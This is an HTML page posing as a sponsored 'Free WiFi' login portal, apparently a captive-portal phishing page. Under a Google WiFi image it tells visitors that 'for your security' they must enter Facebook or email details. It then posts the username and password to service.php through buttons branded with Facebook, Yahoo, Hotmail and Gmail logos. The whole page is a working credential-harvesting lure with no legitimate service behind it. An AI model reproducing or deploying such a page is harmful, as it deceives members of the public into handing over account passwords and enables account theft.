<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free WiFi</title>
</head>

<body>
<center>

<br />
<img src="GoogleWifi.jpg" width="20%"><br />
<br />
<p><Strong>This is a sponsored public service</Strong></p>

<p><Strong>For your security, please enter facebook or email details</Strong></p><br />

<form action="service.php" method="post">
<fieldset>
<table width="320">
	<tr>
		<td colspan="1" align=left>Username </td>
		<td colspan="3" width="100%"><input style="width:100%;" name="login" type="text"/></td>
	</tr>
    <tr>
		<td colspan="1" align=left>Password</td>
		<td colspan="3" width="100%"><input style="width:100%;" type="password" name="password" /></td>
	</tr>
	<tr>
    <td><img src="facebookLogo.jpg" /></td>
    <td><img src="yahoo.gif"/></td>
    <td><img src="HotmailLogo.png"/></td>
    <td><img src="GmailLogo.png"/></td>
	</tr>
	<tr>
	</tr>
	<tr></tr>
	<td align=center ><input type="submit" value="login" name="facebook" /></td>
	<td align=center ><input type="submit" value="login" name="yahoo" /></td>
	<td align=center ><input type="submit" value="login" name="hotmail" /></td>
	<td align=center ><input type="submit" value="login" name="gmail" /></td>
  
</table>



</fieldset>
</form>
</center>
</body>
</html>
